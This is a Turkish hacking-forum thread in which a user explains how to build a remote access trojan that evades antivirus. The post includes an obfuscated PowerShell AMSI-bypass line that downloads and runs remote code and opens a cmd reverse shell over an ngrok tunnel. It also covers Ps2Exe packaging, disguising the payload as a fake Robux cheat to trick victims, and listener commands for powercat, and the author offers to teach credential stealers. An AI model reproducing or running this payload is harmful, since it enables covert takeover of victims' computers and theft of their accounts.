Forumda yenilikler devam etmektedir , çalışmalara devam ettiğimiz kısa süre içerisinde güzel bir görünüme sahip olduk daha iyisi için lütfen çalışmaların bitmesini bekleyiniz. Tıkla ve Git
x

Son konular

FULL FUDLU RAT NASIL YAPILIR AÇIKLIYORUM

FULL FUDLU RAT NASIL YAPILIR AÇIKLIYORUM
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

karakorsan3162

FD Üye
Katılım
Ağu 23, 2023
Mesajlar
636
Etkileşim
12
Puan
18
F-D Coin
66
merhaba forum üyeleri (Yazıyı yazmak sandığımdan daha da uzun sürdü
:D
mazur görün)

Discord: ahmedildo_


size kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)
img:



1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz
img:

2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp
img:



3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.
img:

Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.
img:

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak
img:

Buradaki isteğim sizden tcp:// hariç kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString(' -c ngrok_host -p ngrok_port-e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama linkini aşşağıya salıyorum ama benim linkimden de indirmeyebilirsiniz tamamiyle size kalmış ben olsam google amcadan güvenli kaynak arardım çünkü rastgele bir yerden indirip koydum (herşeyi ben yapamam maalesef
:D
)

bu linkten indirip açabilirsiniz


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!
img:

bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR
 

TheSyrox

İllegal Toplum
FD Üye
Katılım
Haz 16, 2023
Mesajlar
2,100
Etkileşim
4
Puan
38
Konum
Ananın ami
Web sitesi
t.me
F-D Coin
66
rezillik şakamı full fudlu yazmışsın bide virustotale atsan yaklaşık 1 2 güne fudu patlar rezilsiniz.
herkese kötü yorum yazmak zorundamısın
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Similar threads

  • Kilitli
*** *** Gizli metin: Gizli metni görüntülemek için yeterli hakka sahip değilsiniz. Forum konusunu ziyaret edin! *** [/color] *** *** Gizli metin: Gizli metni görüntülemek için yeterli hakka sahip değilsiniz. Forum konusunu ziyaret edin! *** [/SIZE][/color]  
Cevaplar
64
Görüntüleme
658
  • Kilitli
Not : Eski Bir Anlatımdır Ama Yenilerde %80 Oranında aynıdır. Öncelikle RAT, keylogger, trojan nedir? Hepsini tek kalıba sokmak gerekirse, karşı tarafın bilgisayarına bir dosya gönderirsiniz.Karşı taraf bu dosyayı açtıktan sonra o bilgisayarı ele geçirmiş olursunuz. Kendi...
Cevaplar
79
Görüntüleme
1K
Page Speed (Sayfa Hızı) Terimleri ve Çözümleri Sayfa hızı ölçüm araçlarından bahsetmiştik. Şimdi de, sayfa hızı ile ilgili kapsamlı bir dosya hazırladık. Bu yazımızda en çok karşılaşılan page speed terimlerinin ne olduğunu, sayfa hızı anlamında önem derecesi ve nasıl düzeltileceğine dair...
Cevaplar
0
Görüntüleme
159
ÖZET Meme başı akıntıları kadınlar arasında oldukça rahatsız edici ve endişe verici bir şikayettir. Genel olarak görülme sıklığı %5 civarında olsada malignite sıklığı %47 ye kadar yükselebilmektedir. Çalışmamız kapsamında retrospektif olarak meme başı akıntısı nedeniyle kliniğimize başvuran...
Cevaplar
0
Görüntüleme
172
CMD Nedir? CMD, İngilizce Command (komut) kelimesinin kısaltmasıdır. Hemen hemen tüm modern Microsoft Windows işletim sistemlerinde varsayılan komut satırı yorumlayıcısıdır. Orijinal adıyla CMD.exe, bazen eski kullanıcılar tarafından MS-DOS ile karıştırılmaktadır. CMD ile MS-DOS arasında...
Cevaplar
0
Görüntüleme
94
858,467Konular
981,169Mesajlar
29,537Kullanıcılar
emirbregaSon üye
Üst Alt